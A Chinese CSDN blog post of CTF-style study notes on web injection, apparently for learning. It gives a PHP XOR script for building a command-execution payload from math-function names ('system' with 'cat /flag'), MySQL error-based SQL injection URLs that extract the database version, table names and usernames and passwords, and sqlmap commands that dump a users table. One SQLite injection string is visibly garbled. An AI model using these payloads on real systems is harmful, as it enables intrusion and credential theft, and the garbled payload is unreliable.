end的sql学习5

最新推荐文章于 2021-12-07 17:13:16 发布
最新推荐文章于 2021-12-07 17:13:16 发布
阅读量264 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45781155/article/details/109281294
版权

数学函数利用(只能输入数学函数时):
先进行异或

<?php
$payload = ['abs', 'acos', 'acosh', 'asin', 'asinh', 'atan2', 'atan', 'atanh',  'bindec', 'ceil', 'cos', 'cosh', 'decbin' , 'decoct', 'deg2rad', 'exp', 'expm1', 'floor', 'fmod', 'getrandmax', 'hexdec', 'hypot', 'is_finite', 'is_infinite', 'is_nan', 'lcg_value', 'log10', 'log1p', 'log', 'max', 'min', 'mt_getrandmax', 'mt_rand', 'mt_srand', 'octdec', 'pi', 'pow', 'rad2deg', 'rand', 'round', 'sin', 'sinh', 'sqrt', 'srand', 'tan', 'tanh'];
for($k=1;$k<=sizeof($payload);$k++){//sizeof$查询对象或类型的大小
    for($i = 0;$i < 9; $i++){
        for($j = 0;$j <=9;$j++){
            $exp = $payload[$k] ^ $i.$j;
            echo($payload[$k]."^$i$j"."==>$exp");
            echo "       ";
        }
    }
}
?>

然后根据函数构造命令: _GET{system}(_GET{cat%20/flag})

$pi=(is_nan^(6).(4)).(tan^(1).(5));$pi=$$pi;$pi{0}($pi{1})&0=system&1=cat%20/flag     // _GET{system}(_GET{cat%20/flag})

建表包注入:
table_name=aaa as select sql as[ &columns[ o] [ name]=]fronsqlite_master ; &columns[o] [type]-2

报错注入

报错注入形式上是两个嵌套的查询:select…(select…)
先执行()里面的,再执行外面的。
主要利用以下几个SQL函数:
rand():随机函数,返回0~1之间的某个值
floor(a):取整函数,返回小于等于a,且最接近a的整数
count():聚合函数也称为计数函数,返回查询对象的总数
group by clause分组语句:按照查询结果分组

select count(*) from table group by floor(rand(0)*2)

查询的时候,使用rand,该值会被多次计算。在使用group by的时候,floor(rand(0)*2)会被执行一次,如果虚表不存在记录,插入虚表的时候会再被执行一次。在一次多次记录的查询过程中,floor(rand(0)*2)==0110111

利用:
获取数据库:

 URL/index.php?id=0' union select 1,2,3 from (select count(*),concat(select concat(version(),0x3a,0x3a,database(),0x3a,0x3a,user(),0x3a)limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+

获取表名:

URL/index.php?id=0' union select 1,2,3 from (select count(*),concat(select concat(table_name,0x3a,0x3a) from information_schema.tables where table_schema=databse() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+

获取用户信息:

 URL/index.php?id=0' union select 1,2,3 from (select count(*),concat(select concat(username,0x3a,0x3a,password,0x3a,0x3a) from security.users limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+

SQLMAP
查询数据库名

python sqlmap.py -u "URL" --current -db

查询表名

python sqlmap.py -u "URL" -D security --tables

查询表列名

python sqlmap.py -u "URL" -D security -T users --columns

查询列值

python sqlmap.py -u "URL" -D security -T users -C username,password --dump
闲人end
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
SQL学习笔记.docx
09-08
"SQL学习笔记" 本文档是关于 SQL 学习笔记的总结,涵盖了 SQL 的基本概念、函数、语法、应用场景等方面。下面是对标题、描述、标签和部分内容的详细解释: SQL 基本概念 SQL(Structured Query Language)是一种...
endsql注入学习4
qq_45781155的博客
09-29 114
Mysql的读写文件注入 一,读文件注入 前提:1,用户权限足够高,尽量具用root权限。 2,secure_file_priy不为NULL。 注入格式: URL+读取文件的目录/?id=1‘ union select 1,load_file(“F:\flag.txt”),3 --+ 二,写文件注入 mysql> set global general_log = on (数据库这个要打开) 注入格式:注入格式: URL+读取文件的目录/?id=1‘ union select 1,’<?php p
SQL中case,when,then,end的用法(…
qq_20630893的博客
08-04 2427
转载自:http://blog.csdn.net/chaojishuaigeli/article/details/8165802 create database demo   use demo      create table [user]   (       [uId] int identity(1,1) primary key,       [name] 
SQL中的go、begin、end的用法
weixin_30929011的博客
03-16 2458
go 向 SQL Server 实用工具发出一批 Transact-SQL 语句结束的信号。go是把t-sql语句分批次执行。(一步成功了才会执行下一步,即一步一个go)BEGIN 和 END 语句用于将多个 Transact-SQL 语句组合为一个逻辑块。在控制流语句必须执行包含两条或多条 Transact-SQL 语句的语句块的任何地方,都可以使用 BEGIN 和 END 语句。例如,当 IF...
SQL笔记五基础结束
lengyuely的博客
12-07 1056
函数 函数只能且仅有一个返回值 #创建语法 create function 函数名(参数列表) returns 返回类型 begin 函数体 end 参数列表 参数名 参数类型 函数体 肯定要有return语句 函数体只有一句话时,可以省略begin end 使用delimiter语句设置结束标志 #调用语法 select 函数名(参数列表) #案例 DELIMITER $ CREATE FUNCTION myf1() RETURNS INT BEGIN DECLARE c INT DEFAULT 0;
sql server学习
最新发布
03-25
3. **Transact-SQL(T-SQL)扩展**:SQL Server使用T-SQL作为其扩展的SQL语法,包括流程控制(IF-ELSE, WHILE, BEGIN-END)、变量声明和赋值、异常处理(TRY-CATCH)等,这些使得在数据库中编写复杂逻辑成为可能。...
sql学习之CASE WHEN THEN ELSE END的用法
09-10
SQL语言中,`CASE WHEN THEN ELSE END`结构是一种强大的条件判断工具,它允许你在查询中根据特定条件执行不同的逻辑。这个结构可以在`SELECT`、`WHERE`、`HAVING`、`UPDATE`和`INSERT`等语句中使用,以实现复杂的...
sql学习文档
06-16
在“sql学习文档”这个主题中,我们可以深入探讨以下几个关键知识点: 1. SQL基础: - 数据库概念:理解数据库是什么,它的作用以及常见的数据库管理系统,如MySQL、Oracle、SQL Server等。 - 数据类型:了解SQL...
SQL 特殊语句(学习笔记)
12-15
SQL语言中,有一些特殊的语句能够帮助我们执行特定的操作,比如以XML格式返回数据、处理大批量数据的插入以及数据类型的转换等。下面将详细解释这些知识点。 【1】XML返回 在SQL中,我们可以使用`FOR XML`子句将...
sql java 解析_Java 实现对Sql语句解析
weixin_39878698的博客
02-12 1624
最近要实现一个简易的数据库系统,除了要考虑如何高效的存储和访问数据,建立表关系外,对基本的sql查询语句要做一个解析,这样我们才能知道用户的查询要求;因为时间关系,参考了已有的一篇文章,并对其实现中出的小问题给予更正,在这里跟大家共享一下。原文请查阅http://www.cnblogs.com/pelephone/articles/sql-parse-single-word.html第一步:先对s...
解析单句sql_Java 实现对Sql语句解析
weixin_33561910的博客
12-29 331
最近要实现一个简易的数据库系统,除了要考虑如何高效的存储和访问数据,建立表关系外,对基本的sql查询语句要做一个解析,这样我们才能知道用户的查询要求;因为时间关系,参考了已有的一篇文章,并对其实现中出的小问题给予更正,在这里跟大家共享一下。原文请查阅http://www.cnblogs.com/pelephone/articles/sql-parse-single-word.html第一步:先对s...
endSQL注入学习2
qq_45781155的博客
09-17 221
information_schema :在Mysql5.0以上版本中,为了方便管理,默认定义了information_schema数据库,用来存储数据库元信息,其中具有表schemate(数据库名),tables(表名),columns(列名或字段名)。 在schemate表中:schema_name字段用来存储数据库名。 在tables表中:table_schema和table_name 分别用来储存数据库名和表名。 在columns表中,table_schema(数据库名),table_name(表名)
SQL中case..when..then..else..end的查询用法
qq_36923376的博客
08-26 1790
  如上图,查询student表中的姓名和性别,其中原表中的sex列是用字符“1”、“2”代替的,所以真正查询出来的数据想更直观一些,把“1”、“2”改为“男”、“女”,这时就用到上述sql语句了。case和end相当声明开始、结束,when后是判断是否为真,then是当when条件为真,就把数据修改其后的数据。end后面(“性别”)是对列名重命名。 ...
sql end关键字
qq_37181771的博客
05-11 2518
这是开始的代码段: if (onduty.ID &lt;= 0)                 {                     var adminProjects =                         new BaseDAL&lt;Project&gt;                         {                             Tab...
SQL 流程控制语句 之二 BEGIN…END语句介绍
热门推荐
对象本无根,类型亦无形。本来无一物,何处惹尘埃
07-10 1万+
SQL 流程控制语句 之二  BEGIN…END语句介绍 执行以下SQL  BEGIN…END语句:declare @r int ,@s int ,@t intselect @r=2,@s=3 print @rwhile @r  begin     select @t=100*@r+@s     print @t     select @r=@r+2  
endsql学习3
qq_45781155的博客
09-26 354
盲注blink blind SQL(盲注)是注入攻击的一种,向数据库发送true或false 这样的问题,根据应用程序返回的信息判断结果。 盲注语句: if(ascii(substr(datadase(),1,1)=115,1,sleep(3))) 当数据库名第一个字母的ASCII码值等于115时,执行一次sleep(3)函数等待3秒。 基于布尔型的盲注: select length(database()); select substr(database(),1,1); select ascii(subst
sql case when多条件写法及sql常用函数
weixin_45304198的博客
12-21 7096
一,case when 格式 1、 简单Case函数格式 : case 列名 when 条件值1 then 值1 when 条件值2 then 值2 ...... else 默认值 end 简单栗子: SELECT Id, address, tel, case name when 0 then ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值